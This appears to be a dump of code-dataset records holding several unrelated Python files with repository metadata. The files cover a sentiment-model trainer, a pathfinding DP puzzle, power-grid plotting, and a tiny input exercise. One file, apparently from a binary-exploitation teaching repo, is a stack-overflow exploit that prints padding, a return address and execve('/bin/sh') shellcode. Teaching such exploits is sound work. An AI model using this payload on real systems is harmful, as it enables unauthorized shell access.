] | null | null | null | nome=input("Digite seu nome:")
idade=int(input("Digite sua idade:"))
sexo=input("Digite seu sexo [m/f]:")
tupla=(nome,idade,sexo)
print(tupla) | 28.4 | 37 | 0.711268 | nome=input("Digite seu nome:")
idade=int(input("Digite sua idade:"))
sexo=input("Digite seu sexo [m/f]:")
tupla=(nome,idade,sexo)
print(tupla) | 0 | 0 | 0 |
adca1b751b37f0f6ccdcc090e92f6071104cc127 | 6,844 | py | Python | sentiment_train_model.py | justinli930/Public-Morale-Over-Covid | 36fc07e48fe5fcf11cc9c35856f3e2eedc4998ec | [
"Apache-2.0"
] | null | null | null | sentiment_train_model.py | justinli930/Public-Morale-Over-Covid | 36fc07e48fe5fcf11cc9c35856f3e2eedc4998ec | [
"Apache-2.0"
] | null | null | null | sentiment_train_model.py | justinli930/Public-Morale-Over-Covid | 36fc07e48fe5fcf11cc9c35856f3e2eedc4998ec | [
"Apache-2.0"
] | null | null | null | """Structure for model trainer loosely taken from https://realpython.com/sentiment-analysis-python mainly for guide on spacy.
dataset used is from https://ai.stanford.edu/~amaas/data/sentiment/
using version 2.3.5 of spacy as version 3 includes api issues when trying to use en cor web sm
"""
import os
from random import shuffle
import numpy as np
import spacy
import pickle
from spacy.util import minibatch, compounding
from spacy.tokenizer import Tokenizer
from spacy.pipeline import Morphologizer
import csv
def format_training_data(direc: str = "data/training/aclImdb/train") -> None:
"""
Loads the training data from file_directory and stores the data into a pickle file
Do not run if you have not downloaded and extracted the files from the downloadable tar.gz
"""
reviews = []
# we have a folder of positive reviews and negative reviews so well do two iterations
for cat in ('pos', 'neg'):
# grabs each individual review (each review is stored in its own text file)
for review_direc in filter(lambda j: j[-4:]=='.txt', os.listdir(f'{direc}/{cat}')):
with open(f'{direc}/{cat}/{review_direc}', encoding="Latin-1") as f:
#cleans the text and cattegorizes it
reviews.append((f.read().replace('<br />', r'\n\n').strip(), {'cats':{'pos':'pos'==cat,'neg':'neg'==cat}}))
with open('data/training/movie_reviews_data.pkl', 'wb') as f:
pickle.dump(reviews, f)
def shuffle_training_data(data: list, split: int = .8) -> tuple[list]:
"""
shuffles the data and separates it by split in order to have a
training dataset and a testing dataset. Default is a 4:1 split
as recommended
"""
shuffle(data)
return data[int(len(data)*split):], data[:int(len(data)*split)]
def grab_training_data(shuffle: bool = False, direc: str = 'data/training/movie_reviews_data.pkl') -> tuple[list]:
"""
Opens the reviews stored in the pickle file.
If shuffle is true that means that we should get the data
ready by running shuffle_training_Data
"""
with open(direc, 'rb') as f:
reviews = pickle.load(f)
return shuffle_training_data(reviews) if shuffle else tuple(reviews)
def save_model(nlp, optimizer, training_data, test_data, directory: str= 'models/sentiment/model_artifacts') -> None:
"""saves the given model"""
with nlp.use_params(optimizer.averages):
nlp.to_disk(directory)
print(f"Model Saved to {directory}")
def train_model(training_data: list[tuple], test_data: list[tuple], count: int):
"""
Trains model given training data. Code structure taken from https://realpython.com/sentiment-analysis-python
Changes were made due to some efficiency issues, unclear code, and outdated uses of APIs and libraries
"""
results_txt = []
nlp = spacy.load("en_core_web_sm") # for en_core_web_sm legacy issue, pip3 install:
# https://github.com/explosion/spacy-models/releases/download/en_core_web_sm-2.2.0/en_core_web_sm-2.2.0.tar.gz
# morphologizer documentation: https://spacy.io/api/morphologizer#add_label
if "textcat" not in nlp.pipe_names:
nlp.add_pipe(nlp.create_pipe("textcat", config={"architecture": "simple_cnn"}), last=True)
textcat = nlp.get_pipe("textcat")
textcat.add_label("pos")
textcat.add_label("neg")
with open('models/sentiment/models/test_data.pkl', 'wb') as f:
pickle.dump(test_data, f)
# code to exclude useless pipes from training
with nlp.disable_pipes([pipe for pipe in nlp.pipe_names if pipe!="textcat"]):
optimizer = nlp.begin_training()
batch_sizes = compounding(4.0, 32.0, 1.001)
for i in range(count):
shuffle(training_data)
batches, loss = minibatch(training_data, size = batch_sizes), {}
for batch in batches:
text, labels = zip(*batch) # batch is in the form [(text,label)] so we zip* and get a list for each
nlp.update(text, labels, drop=.2, sgd=optimizer, losses = loss)
with textcat.model.use_params(optimizer.averages):
results = evaluate_model(nlp.tokenizer, textcat, test_data)
txt_wrp = f'Model #{i+1}/{count}: Precision: {results["precision"]}, Recall: {results["recall"]}, F-Score: {results["f-score"]}, loss:{loss["textcat"]}.'
print(txt_wrp,end=' ')
results_txt.append(txt_wrp)
write_data_to_csv(results, loss, i)
# uncomment to save model "BE CAREFUL MAY DESTROY PREVIOUS MODEL"
save_model(nlp, optimizer, training_data, test_data, f'models/sentiment/models/model{i+1}')
with open('models/sentiment/results.txt', 'w') as f:
for result in results_txt:
f.write(result+'\n')
def evaluate_model(tokenizer: Tokenizer, textcat: Morphologizer, test_data: list) -> dict:
    """
    Score the classifier on held-out data.

    The 'pos' category score is thresholded at 0.5 to decide the predicted
    class, then compared against the gold 'cats' labels to accumulate a
    confusion matrix, from which precision, recall and F1 are derived.

    :param tokenizer: the pipeline's tokenizer, applied to each raw text.
    :param textcat: the trained text-categorizer pipe.
    :param test_data: (text, {'cats': {'pos': bool, 'neg': bool}}) tuples.
    :return: {'precision': ..., 'recall': ..., 'f-score': ...}
    """
    tp = tn = 0
    # seed the "false" counters with a tiny epsilon so the ratios below
    # never divide by zero
    fp = fn = 1e-8
    tokens, labels = zip(*((tokenizer(example[0]), example[1]['cats']) for example in test_data))
    predictions = (doc.cats['pos'] for doc in textcat.pipe(tokens))
    for pos_score, truth in zip(predictions, labels):
        if pos_score >= 0.5:
            if truth["pos"]:
                tp += 1
            elif truth["neg"]:
                fp += 1
        else:
            if truth["neg"]:
                tn += 1
            elif truth["pos"]:
                fn += 1
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    # guard the harmonic mean against 0/0 when both components are zero
    f_score = 2 * (precision * recall) / (precision + recall) if precision + recall else 0
    return {"precision": precision, "recall": recall, "f-score": f_score}
if __name__ == "__main__":
    # Uncomment to retrain models
    # DISCLAIMER: takes hours and overwrites other files
    # True -> shuffle the pickled reviews and split them into (train, test)
    data = grab_training_data(True)
    # train_model(data[0], data[1], 25)
| 43.044025 | 165 | 0.654004 | """Structure for model trainer loosely taken from https://realpython.com/sentiment-analysis-python mainly for guide on spacy.
dataset used is from https://ai.stanford.edu/~amaas/data/sentiment/
using version 2.3.5 of spacy as version 3 includes api issues when trying to use en cor web sm
"""
import os
from random import shuffle
import numpy as np
import spacy
import pickle
from spacy.util import minibatch, compounding
from spacy.tokenizer import Tokenizer
from spacy.pipeline import Morphologizer
import csv
def format_training_data(direc: str = "data/training/aclImdb/train") -> None:
    """
    Loads the training data from file_directory and stores the data into a pickle file.
    Do not run if you have not downloaded and extracted the files from the downloadable tar.gz.

    :param direc: root of the extracted aclImdb training set; must contain
        'pos' and 'neg' sub-folders of per-review .txt files.

    Output: pickles a list of (review_text, {'cats': {'pos': bool, 'neg': bool}})
    tuples to data/training/movie_reviews_data.pkl.
    """
    reviews = []
    # we have a folder of positive reviews and one of negative reviews, so do two iterations
    for cat in ('pos', 'neg'):
        # grab each individual review (each review is stored in its own text file)
        for review_direc in filter(lambda j: j[-4:]=='.txt', os.listdir(f'{direc}/{cat}')):
            # Latin-1 can decode any byte sequence, so odd files cannot crash the read
            with open(f'{direc}/{cat}/{review_direc}', encoding="Latin-1") as f:
                # strip HTML line breaks and attach the gold label for this folder
                # NOTE(review): r'\n\n' inserts the literal characters backslash-n,
                # not real newlines -- confirm that is the intended replacement
                reviews.append((f.read().replace('<br />', r'\n\n').strip(), {'cats':{'pos':'pos'==cat,'neg':'neg'==cat}}))
    with open('data/training/movie_reviews_data.pkl', 'wb') as f:
        pickle.dump(reviews, f)
def shuffle_training_data(data: list, split: float = .8) -> tuple[list]:
    """
    Shuffle `data` in place and split it into (training, test) lists.

    :param data: list of examples; mutated by random.shuffle.
    :param split: fraction of the data assigned to the *training* set
        (default .8, i.e. the recommended 4:1 train:test split).
    :return: (training_data, test_data)

    Bug fix: the previous version returned the slices in the wrong order
    (tail first), so the caller's "training" set received only 1 - split
    of the data instead of the documented 4:1 majority share.
    """
    shuffle(data)
    cut = int(len(data) * split)  # boundary index between train and test
    return data[:cut], data[cut:]
def grab_training_data(shuffle: bool = False, direc: str = 'data/training/movie_reviews_data.pkl') -> tuple[list]:
    """
    Opens the reviews stored in the pickle file.
    If shuffle is true the data is prepared by running shuffle_training_data.

    :param shuffle: when True, return the split produced by
        shuffle_training_data; when False, return tuple(reviews).
    :param direc: path of the pickle written by format_training_data.

    NOTE(review): with shuffle=False the result is a tuple of *all* review
    tuples, not a two-element (train, test) pair as the annotation suggests;
    callers indexing [0]/[1] only get a split when shuffle=True -- confirm
    this asymmetry is intended.
    """
    with open(direc, 'rb') as f:
        reviews = pickle.load(f)
    return shuffle_training_data(reviews) if shuffle else tuple(reviews)
def save_model(nlp, optimizer, training_data, test_data, directory: str= 'models/sentiment/model_artifacts') -> None:
    """
    Saves the given model.

    Serializes `nlp` to `directory` using the optimizer's averaged weights.
    `training_data` and `test_data` are accepted but not referenced here.
    """
    # swap in the averaged parameters so the saved model is the stable variant
    with nlp.use_params(optimizer.averages):
        nlp.to_disk(directory)
    print(f"Model Saved to {directory}")
def train_model(training_data: list[tuple], test_data: list[tuple], count: int):
    """
    Trains model given training data. Code structure taken from
    https://realpython.com/sentiment-analysis-python
    Changes were made due to some efficiency issues, unclear code, and outdated
    uses of APIs and libraries.

    :param training_data: (text, {'cats': {'pos': bool, 'neg': bool}}) tuples,
        shuffled in place each epoch.
    :param test_data: held-out tuples, pickled once and re-evaluated per epoch.
    :param count: number of epochs; a model snapshot is saved for each one.
    """
    results_txt = []
    nlp = spacy.load("en_core_web_sm") # for en_core_web_sm legacy issue, pip3 install:
    # https://github.com/explosion/spacy-models/releases/download/en_core_web_sm-2.2.0/en_core_web_sm-2.2.0.tar.gz
    # morphologizer documentation: https://spacy.io/api/morphologizer#add_label
    # make sure the pipeline has a text categorizer before labelling it
    if "textcat" not in nlp.pipe_names:
        nlp.add_pipe(nlp.create_pipe("textcat", config={"architecture": "simple_cnn"}), last=True)
    textcat = nlp.get_pipe("textcat")
    textcat.add_label("pos")
    textcat.add_label("neg")
    # keep the exact test split alongside the saved models
    with open('models/sentiment/models/test_data.pkl', 'wb') as f:
        pickle.dump(test_data, f)
    # code to exclude useless pipes from training
    with nlp.disable_pipes([pipe for pipe in nlp.pipe_names if pipe!="textcat"]):
        optimizer = nlp.begin_training()
        # compounding batch size: ramps from 4 to 32 examples per batch
        batch_sizes = compounding(4.0, 32.0, 1.001)
        for i in range(count):
            shuffle(training_data)
            batches, loss = minibatch(training_data, size = batch_sizes), {}
            for batch in batches:
                text, labels = zip(*batch) # batch is in the form [(text,label)] so we zip* and get a list for each
                nlp.update(text, labels, drop=.2, sgd=optimizer, losses = loss)
            # score the epoch using the optimizer's averaged weights
            with textcat.model.use_params(optimizer.averages):
                results = evaluate_model(nlp.tokenizer, textcat, test_data)
            txt_wrp = f'Model #{i+1}/{count}: Precision: {results["precision"]}, Recall: {results["recall"]}, F-Score: {results["f-score"]}, loss:{loss["textcat"]}.'
            print(txt_wrp,end=' ')
            results_txt.append(txt_wrp)
            write_data_to_csv(results, loss, i)
            # uncomment to save model "BE CAREFUL MAY DESTROY PREVIOUS MODEL"
            save_model(nlp, optimizer, training_data, test_data, f'models/sentiment/models/model{i+1}')
    # write a human-readable recap of every epoch
    with open('models/sentiment/results.txt', 'w') as f:
        for result in results_txt:
            f.write(result+'\n')
def evaluate_model(tokenizer: Tokenizer, textcat: Morphologizer, test_data: list) -> dict:
    """
    Evaluate the model to see if it is worthwhile to save the model.

    Thresholds the 'pos' category score at 0.5 and compares the prediction
    against the gold 'cats' labels to build a confusion matrix.

    :param tokenizer: the pipeline's tokenizer, applied to each raw text.
    :param textcat: the trained text-categorizer pipe.
    :param test_data: (text, {'cats': {'pos': bool, 'neg': bool}}) tuples.
    :return: dict with 'precision', 'recall' and 'f-score'.
    """
    true_positives = true_negatives = 0
    false_positives = false_negatives = 1e-8 # near 0 to avoid dividing by zero below
    # tokenize each text and collect its gold labels in a single pass
    tokens, labels = zip(*map(lambda x: (tokenizer(x[0]), x[1]['cats']), test_data))
    for score, true_label in zip([i.cats['pos'] for i in textcat.pipe(tokens)], labels):
        if score >= 0.5 and true_label["pos"]:
            true_positives += 1
        elif score >= 0.5 and true_label["neg"]:
            false_positives += 1
        elif score < 0.5 and true_label["neg"]:
            true_negatives += 1
        elif score < 0.5 and true_label["pos"]:
            false_negatives += 1
    precision = true_positives / (true_positives + false_positives)
    recall = true_positives / (true_positives + false_negatives)
    # harmonic mean, guarded against 0/0 when precision + recall is zero
    f_score = 2 * (precision * recall) / (precision + recall) if precision + recall else 0
    return {"precision": precision, "recall": recall, "f-score": f_score}
def write_data_to_csv(data: dict, loss: dict, count: int, csv_direc: str = 'models/sentiment/evaluations.csv') -> None:
    """
    Append one epoch's evaluation metrics to the metrics CSV.

    On the first epoch (count == 0) the file is (re)created and a header row
    is written before the data row; later epochs append a single data row.

    :param data: metrics dict with 'precision', 'recall' and 'f-score' keys.
    :param loss: spaCy losses dict; the 'textcat' entry is recorded.
    :param count: zero-based epoch number, also written as the model number.
    :param csv_direc: path of the CSV file to create/append.
    """
    new_row = [count, loss['textcat'], data['precision'], data['recall'], data['f-score']]
    # epoch 0 truncates any previous run's file; later epochs append to it
    mode = 'w' if not count else 'a'
    with open(csv_direc, mode, newline='') as csvfile:
        csvwriter = csv.writer(csvfile)
        if not count:
            csvwriter.writerow(["MODEL NUMBER", "LOSS", "PRECISION", "RECALL", "F-SCORE"])
        csvwriter.writerow(new_row)
if __name__ == "__main__":
    # Uncomment to retrain models
    # DISCLAIMER: takes hours and overwrites other files
    # shuffle=True returns (training_data, test_data) from the pickled reviews
    data = grab_training_data(True)
    # train_model(data[0], data[1], 25)
| 622 | 0 | 23 |
46067aa1f219db59d6e7a1fd9908d08cbd9fc4da | 443 | py | Python | files/vuln3/exploit3.py | Lazula/presentation-binary-exploitation-fundamentals | 212a27478210faa4c3655e64d8f982775f5dd58b | [
"Unlicense"
] | null | null | null | files/vuln3/exploit3.py | Lazula/presentation-binary-exploitation-fundamentals | 212a27478210faa4c3655e64d8f982775f5dd58b | [
"Unlicense"
] | null | null | null | files/vuln3/exploit3.py | Lazula/presentation-binary-exploitation-fundamentals | 212a27478210faa4c3655e64d8f982775f5dd58b | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python2
import struct
# 28 filler bytes -- presumably the distance from the overflowed buffer to the
# saved return address on the stack; confirm against the target binary's layout.
padding = 'A'*28
#Address used with gdb
#shellcode_addr = struct.pack("I", 0xffffd040)
#Address used for exploit
# pack the stack address as a 32-bit little-endian unsigned int ("I") so it
# overwrites the saved return address in the target's native byte order
shellcode_addr = struct.pack("I", 0xffffd0b0)
#Source: https://www.exploit-db.com/shellcodes/46809
#execve("/bin/sh", NULL, NULL)
shellcode = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# payload layout: [padding][overwritten return address][shellcode]
exploit = padding + shellcode_addr + shellcode
# Python 2 print statement: emit the raw payload (pipe it into the target)
print exploit
| 22.15 | 94 | 0.733634 | #!/usr/bin/env python2
import struct
# filler reaching the saved return address -- assumes a 28-byte offset;
# TODO confirm with the debugger against the vulnerable binary
padding = 'A'*28
#Address used with gdb
#shellcode_addr = struct.pack("I", 0xffffd040)
#Address used for exploit
# little-endian 32-bit packing of the address the return pointer is redirected to
shellcode_addr = struct.pack("I", 0xffffd0b0)
#Source: https://www.exploit-db.com/shellcodes/46809
#execve("/bin/sh", NULL, NULL)
shellcode = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# final payload: padding, then the new return address, then the shellcode itself
exploit = padding + shellcode_addr + shellcode
# Python 2 print statement: writes the raw exploit string to stdout
print exploit
| 0 | 0 | 0 |
985f29411a166562fbd25509052b0da7b3013412 | 1,253 | py | Python | dp/q11.py | pengfei-chen/algorithm_qa | c2ccdcb77004e88279d61e4e433ee49527fc34d6 | [
"MIT"
] | 79 | 2018-03-27T12:37:49.000Z | 2022-01-21T10:18:17.000Z | dp/q11.py | pengfei-chen/algorithm_qa | c2ccdcb77004e88279d61e4e433ee49527fc34d6 | [
"MIT"
] | null | null | null | dp/q11.py | pengfei-chen/algorithm_qa | c2ccdcb77004e88279d61e4e433ee49527fc34d6 | [
"MIT"
] | 27 | 2018-04-08T03:07:06.000Z | 2021-10-30T00:01:50.000Z | """
给定一个二维数组map,含义是一张地图,例如,如下矩阵:
-2 -3 3
-5 -10 1
0 30 -5
游戏规则如下:
(1)骑士从左上角出发,每次只能向右或者向下走,最后到达右下角见到公主。
(2)地图中每个位置的值代表骑士要遭遇的事情。如果是负数,说明此处有怪兽,
要让骑士掉血。如果是非负数,则代表此处有血瓶,能让骑士回血。
(3)骑士从左上角到右下角的过程中,走到任何一个位置,血量都不能少于1.
为了保证骑士能见到公主,初始血量至少是多少?根据map,返回初始血量。
"""
if __name__ == '__main__':
my_map = [[-2, -3, 3], [-5, -10, 1], [10, 30, -5]]
print(DungenonGame.get_min_hp(my_map)) | 27.23913 | 84 | 0.533919 | """
给定一个二维数组map,含义是一张地图,例如,如下矩阵:
-2 -3 3
-5 -10 1
0 30 -5
游戏规则如下:
(1)骑士从左上角出发,每次只能向右或者向下走,最后到达右下角见到公主。
(2)地图中每个位置的值代表骑士要遭遇的事情。如果是负数,说明此处有怪兽,
要让骑士掉血。如果是非负数,则代表此处有血瓶,能让骑士回血。
(3)骑士从左上角到右下角的过程中,走到任何一个位置,血量都不能少于1.
为了保证骑士能见到公主,初始血量至少是多少?根据map,返回初始血量。
"""
class DungenonGame:
    """Minimum starting HP for the knight-and-princess dungeon game.

    The knight walks from the top-left to the bottom-right cell, moving only
    right or down; negative cells damage him, non-negative cells heal him,
    and his HP must stay >= 1 on every visited cell.
    """

    @classmethod
    def get_min_hp(cls, m):
        """
        Return the minimum initial HP that survives some right/down path.

        :param m: 2-D list of ints (the map); an empty map needs just 1 HP.
        :return: minimal starting HP as an int.

        Bottom-up DP: dp[r][c] is the minimal HP required when *entering*
        cell (r, c). (Also removes the dead `rows += 1` / `cols += 1`
        statements of the previous version, which had no effect inside
        the `for` loops.)
        """
        if not m:
            return 1
        rows, cols = len(m), len(m[0])
        dp = [[0 for _ in range(cols)] for _ in range(rows)]
        # destination cell: need at least 1 HP after applying its value
        dp[rows - 1][cols - 1] = max(1, 1 - m[rows - 1][cols - 1])
        # last column: the only move is down
        for r in range(rows - 2, -1, -1):
            dp[r][cols - 1] = max(dp[r + 1][cols - 1] - m[r][cols - 1], 1)
        # last row: the only move is right
        for c in range(cols - 2, -1, -1):
            dp[rows - 1][c] = max(dp[rows - 1][c + 1] - m[rows - 1][c], 1)
        # interior cells: pick the cheaper of the two successors
        for r in range(rows - 2, -1, -1):
            for c in range(cols - 2, -1, -1):
                down = max(dp[r + 1][c] - m[r][c], 1)
                right = max(dp[r][c + 1] - m[r][c], 1)
                dp[r][c] = min(down, right)
        return dp[0][0]
if __name__ == '__main__':
my_map = [[-2, -3, 3], [-5, -10, 1], [10, 30, -5]]
print(DungenonGame.get_min_hp(my_map)) | 811 | 41 | 23 |
f4190354b682afdd25419c77b14e1ec356a5d810 | 6,060 | py | Python | pandapower/plotting/plotly/vlevel_plotly.py | suzannejanssen/pandapower | 8d0d422c28924c85e774e0e357e4abff86ff3c55 | [
"BSD-3-Clause"
] | 1 | 2020-10-19T06:39:15.000Z | 2020-10-19T06:39:15.000Z | pandapower/plotting/plotly/vlevel_plotly.py | miek770/pandapower | de004efc1b7432a633792af4f551f7635a02db47 | [
"BSD-3-Clause"
] | null | null | null | pandapower/plotting/plotly/vlevel_plotly.py | miek770/pandapower | de004efc1b7432a633792af4f551f7635a02db47 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2016-2018 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import pandas as pd
from pandapower.plotting.generic_geodata import create_generic_coordinates
from pandapower.plotting.plotly.traces import create_bus_trace, create_line_trace, create_trafo_trace, draw_traces, \
version_check
from pandapower.plotting.plotly.get_colors import get_plotly_color_palette
from pandapower.plotting.plotly.mapbox_plot import *
from pandapower.topology import create_nxgraph, connected_components
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
def vlevel_plotly(net, respect_switches=True, use_line_geodata=None, colors_dict=None, on_map=False,
                  projection=None, map_style='basic', figsize=1, aspectratio='auto', line_width=2,
                  bus_size=10):
    """
    Plots a pandapower network in plotly
    using lines/buses colors according to the voltage level they belong to.
    If no geodata is available, artificial geodata is generated. For advanced plotting see the tutorial

    INPUT:
        **net** - The pandapower format network. If none is provided, mv_oberrhein() will be
        plotted as an example

    OPTIONAL:
        **respect_switches** (bool, True) - Respect switches when artificial geodata is created

        **use_line_geodata** (bool, True) - defines if lines patches are based on net.line_geodata of the lines (True)
        or on net.bus_geodata of the connected buses (False)

        **colors_dict** (dict, None) - dictionary for customization of colors for each voltage level in the form:
        voltage_kv : color. When None, a default palette is generated.
        (Bug fix: previously this argument was unconditionally overwritten
        by the generated palette, so user-supplied colors were ignored.)

        **on_map** (bool, False) - enables using mapbox plot in plotly If provided geodata are not real
        geo-coordinates in lon/lat form, on_map will be set to False.

        **projection** (String, None) - defines a projection from which network geo-data will be transformed to
        lat-long. For each projection a string can be found at http://spatialreference.org/ref/epsg/

        **map_style** (str, 'basic') - enables using mapbox plot in plotly
            - 'streets'
            - 'bright'
            - 'light'
            - 'dark'
            - 'satellite'

        **figsize** (float, 1) - aspectratio is multiplied by it in order to get final image size

        **aspectratio** (tuple, 'auto') - when 'auto' it preserves original aspect ratio of the network geodata
        any custom aspectration can be given as a tuple, e.g. (1.2, 1)

        **line_width** (float, 1.0) - width of lines

        **bus_size** (float, 10.0) - size of buses to plot.
    """
    version_check()
    # create geocoord if none are available
    if 'line_geodata' not in net:
        net.line_geodata = pd.DataFrame(columns=['coords'])
    if 'bus_geodata' not in net:
        net.bus_geodata = pd.DataFrame(columns=["x", "y"])
    if len(net.line_geodata) == 0 and len(net.bus_geodata) == 0:
        logger.warning("No or insufficient geodata available --> Creating artificial coordinates." +
                       " This may take some time")
        create_generic_coordinates(net, respect_switches=respect_switches)
        if on_map:
            logger.warning("Map plots not available with artificial coordinates and will be disabled!")
            on_map = False
    # check if geodata are real geographical lat/lon coordinates using geopy
    if on_map and projection is not None:
        geo_data_to_latlong(net, projection=projection)
    # if bus geodata is available, but no line geodata, draw lines between bus coordinates
    if use_line_geodata is None:
        use_line_geodata = len(net.line_geodata) > 0
    elif use_line_geodata and len(net.line_geodata) == 0:
        logger.warning("No or insufficient line geodata available --> only bus geodata will be used.")
        use_line_geodata = False
    # getting connected components without consideration of trafos
    graph = create_nxgraph(net, include_trafos=False)
    vlev_buses = connected_components(graph)
    # getting unique sets of buses for each voltage level
    vlev_bus_dict = {}
    for vl_buses in vlev_buses:
        if net.bus.loc[vl_buses, 'vn_kv'].unique().shape[0] > 1:
            logger.warning('buses from the same voltage level does not have the same vn_kv !?')
        vn_kv = net.bus.loc[vl_buses, 'vn_kv'].unique()[0]
        if vlev_bus_dict.get(vn_kv):
            vlev_bus_dict[vn_kv].update(vl_buses)
        else:
            vlev_bus_dict[vn_kv] = vl_buses
    # only build a default colormap when the caller did not supply one
    if colors_dict is None:
        colors = get_plotly_color_palette(len(vlev_bus_dict))
        colors_dict = dict(zip(vlev_bus_dict.keys(), colors))
    # creating traces for buses and lines for each voltage level
    bus_traces = []
    line_traces = []
    for vn_kv, buses_vl in vlev_bus_dict.items():
        vlev_color = colors_dict[vn_kv]
        bus_trace_vlev = create_bus_trace(net, buses=buses_vl, size=bus_size, legendgroup=str(vn_kv),
                                          color=vlev_color, trace_name='buses {0} kV'.format(vn_kv))
        if bus_trace_vlev is not None:
            bus_traces += bus_trace_vlev
        # lines whose both endpoints belong to this voltage level
        vlev_lines = net.line[net.line.from_bus.isin(buses_vl) & net.line.to_bus.isin(buses_vl)].index.tolist()
        line_trace_vlev = create_line_trace(net, lines=vlev_lines, use_line_geodata=use_line_geodata,
                                            respect_switches=respect_switches, legendgroup=str(vn_kv),
                                            color=vlev_color, width=line_width,
                                            trace_name='lines {0} kV'.format(vn_kv))
        if line_trace_vlev is not None:
            line_traces += line_trace_vlev
    trafo_traces = create_trafo_trace(net, color='gray', width=line_width * 2)
    draw_traces(line_traces + trafo_traces + bus_traces, showlegend=True,
                aspectratio=aspectratio, on_map=on_map, map_style=map_style, figsize=figsize)
| 45.223881 | 120 | 0.679703 | # -*- coding: utf-8 -*-
# Copyright (c) 2016-2018 by University of Kassel and Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
import pandas as pd
from pandapower.plotting.generic_geodata import create_generic_coordinates
from pandapower.plotting.plotly.traces import create_bus_trace, create_line_trace, create_trafo_trace, draw_traces, \
version_check
from pandapower.plotting.plotly.get_colors import get_plotly_color_palette
from pandapower.plotting.plotly.mapbox_plot import *
from pandapower.topology import create_nxgraph, connected_components
try:
import pplog as logging
except ImportError:
import logging
logger = logging.getLogger(__name__)
def vlevel_plotly(net, respect_switches=True, use_line_geodata=None, colors_dict=None, on_map=False,
                  projection=None, map_style='basic', figsize=1, aspectratio='auto', line_width=2,
                  bus_size=10):
    """
    Plots a pandapower network in plotly
    using lines/buses colors according to the voltage level they belong to.
    If no geodata is available, artificial geodata is generated. For advanced plotting see the tutorial

    INPUT:
        **net** - The pandapower format network. If none is provided, mv_oberrhein() will be
        plotted as an example

    OPTIONAL:
        **respect_switches** (bool, True) - Respect switches when artificial geodata is created

        **use_line_geodata** (bool, True) - defines if lines patches are based on net.line_geodata of the lines (True)
        or on net.bus_geodata of the connected buses (False)

        **colors_dict** (dict, None) - dictionary for customization of colors for each voltage level in the form:
        voltage_kv : color
        NOTE(review): this argument is currently overwritten below by the
        generated default palette, so user-supplied colors are ignored --
        confirm whether that is intended.

        **on_map** (bool, False) - enables using mapbox plot in plotly If provided geodata are not real
        geo-coordinates in lon/lat form, on_map will be set to False.

        **projection** (String, None) - defines a projection from which network geo-data will be transformed to
        lat-long. For each projection a string can be found at http://spatialreference.org/ref/epsg/

        **map_style** (str, 'basic') - enables using mapbox plot in plotly
            - 'streets'
            - 'bright'
            - 'light'
            - 'dark'
            - 'satellite'

        **figsize** (float, 1) - aspectratio is multiplied by it in order to get final image size

        **aspectratio** (tuple, 'auto') - when 'auto' it preserves original aspect ratio of the network geodata
        any custom aspectration can be given as a tuple, e.g. (1.2, 1)

        **line_width** (float, 1.0) - width of lines

        **bus_size** (float, 10.0) - size of buses to plot.
    """
    version_check()
    # create geocoord if none are available
    if 'line_geodata' not in net:
        net.line_geodata = pd.DataFrame(columns=['coords'])
    if 'bus_geodata' not in net:
        net.bus_geodata = pd.DataFrame(columns=["x", "y"])
    if len(net.line_geodata) == 0 and len(net.bus_geodata) == 0:
        logger.warning("No or insufficient geodata available --> Creating artificial coordinates." +
                       " This may take some time")
        create_generic_coordinates(net, respect_switches=respect_switches)
        if on_map:
            # artificial coordinates are not lat/lon, so mapbox cannot be used
            logger.warning("Map plots not available with artificial coordinates and will be disabled!")
            on_map = False
    # check if geodata are real geographycal lat/lon coordinates using geopy
    if on_map and projection is not None:
        geo_data_to_latlong(net, projection=projection)
    # if bus geodata is available, but no line geodata
    if use_line_geodata is None:
        use_line_geodata = False if len(net.line_geodata) == 0 else True
    elif use_line_geodata and len(net.line_geodata) == 0:
        logger.warning("No or insufficient line geodata available --> only bus geodata will be used.")
        use_line_geodata = False
    # getting connected componenets without consideration of trafos
    graph = create_nxgraph(net, include_trafos=False)
    vlev_buses = connected_components(graph)
    # getting unique sets of buses for each voltage level
    vlev_bus_dict = {}
    for vl_buses in vlev_buses:
        if net.bus.loc[vl_buses, 'vn_kv'].unique().shape[0] > 1:
            logger.warning('buses from the same voltage level does not have the same vn_kv !?')
        vn_kv = net.bus.loc[vl_buses, 'vn_kv'].unique()[0]
        if vlev_bus_dict.get(vn_kv):
            vlev_bus_dict[vn_kv].update(vl_buses)
        else:
            vlev_bus_dict[vn_kv] = vl_buses
    # create a default colormap for voltage levels
    # NOTE(review): overwrites the colors_dict parameter unconditionally (see docstring)
    nvlevs = len(vlev_bus_dict)
    colors = get_plotly_color_palette(nvlevs)
    colors_dict = dict(zip(vlev_bus_dict.keys(), colors))
    # creating traces for buses and lines for each voltage level
    bus_traces = []
    line_traces = []
    for vn_kv, buses_vl in vlev_bus_dict.items():
        vlev_color = colors_dict[vn_kv]
        bus_trace_vlev = create_bus_trace(net, buses=buses_vl, size=bus_size, legendgroup=str(vn_kv),
                                          color=vlev_color, trace_name='buses {0} kV'.format(vn_kv))
        if bus_trace_vlev is not None:
            bus_traces += bus_trace_vlev
        # lines whose endpoints are both inside this voltage level
        vlev_lines = net.line[net.line.from_bus.isin(buses_vl) & net.line.to_bus.isin(buses_vl)].index.tolist()
        line_trace_vlev = create_line_trace(net, lines=vlev_lines, use_line_geodata=use_line_geodata,
                                            respect_switches=respect_switches, legendgroup=str(vn_kv),
                                            color=vlev_color, width=line_width, trace_name='lines {0} kV'.format(vn_kv))
        if line_trace_vlev is not None:
            line_traces += line_trace_vlev
    trafo_traces = create_trafo_trace(net, color='gray', width=line_width * 2)
    draw_traces(line_traces + trafo_traces + bus_traces, showlegend=True,
                aspectratio=aspectratio, on_map=on_map, map_style=map_style, figsize=figsize)
| 0 | 0 | 0 |
